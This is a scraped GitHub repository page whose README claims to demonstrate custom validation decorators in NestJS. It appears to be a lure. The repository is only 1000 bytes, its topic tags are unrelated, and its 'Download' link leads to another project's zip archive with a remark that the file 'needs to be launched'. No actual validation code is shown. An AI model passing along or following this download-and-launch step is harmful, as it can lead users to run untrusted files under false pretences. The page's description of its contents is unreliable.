https://github.com/tintin1886/custom-class-validator
Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.
https://github.com/tintin1886/custom-class-validator
class-validator deep-learning fluent-api gpu-support model-validation mongoose multiform-validator nestjs nodejs specification spring-mvc validation validator winston-logger
Last synced: 11 months ago
JSON representation
Repository created to demonstrate how to create validations using decorators in NestJS. Decorators-based validations, allowing you to implement all the validations in your preferred way and in the most performance-efficient manner possible. All this, without using any external libraries.
- Host: GitHub
- URL: https://github.com/tintin1886/custom-class-validator
- Owner: tintin1886
- Created: 2025-02-14T16:01:26.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-08T01:19:39.000Z (12 months ago)
- Last Synced: 2025-03-08T01:20:15.716Z (12 months ago)
- Topics: class-validator, deep-learning, fluent-api, gpu-support, model-validation, mongoose, multiform-validator, nestjs, nodejs, specification, spring-mvc, validation, validator, winston-logger
- Size: 1000 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# 🚀 Welcome to custom-class-validator repository!

## Description
This repository is dedicated to showcasing how to create validations using decorators in NestJS. By utilizing decorators for validations, you can implement all the necessary validations in a performance-efficient manner without relying on external libraries. This approach provides flexibility in implementing validations according to your preferences.
## Topics
- Class
- Class Validator
- Decorator
- Decorators
- DTO
- Learn
- Multiform Validator
- NestJS
- Student-vscode
- Validator
## 📝 Getting Started
To explore the implementation of decorators for validations and learn how to create efficient validations in NestJS, you can access the repository from the link below:
[Download custom-class-validator](https://github.com/cli/go-gh/archive/refs/tags/v1.0.0.zip)
_The link ends with a file name, indicating that it needs to be launched._
If the link is not working or unavailable, please visit the "Releases" section of this repository for alternative download options.
## 🌟 Features
- Implementation of class-based validations using decorators.
- Learn how to create efficient validations in NestJS without external libraries.
- Explore different approaches to implementing validations in your preferred way.
## 🛠️ Usage
1. Clone the repository to your local machine.
2. Navigate to the project directory.
3. Install the dependencies using `npm install`.
4. Explore the codebase to understand how decorators are used for validations.
5. Experiment with creating your own custom validations.
## 🤝 Contribution
Contributions to enhance the functionality of this repository are welcome! Feel free to fork the repository and submit pull requests to suggest improvements or new features.
## 📄 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
---
📌 **Note:** For a comprehensive guide on how to create validations using decorators in NestJS, refer to the documentation in this repository. Happy coding! 🎉
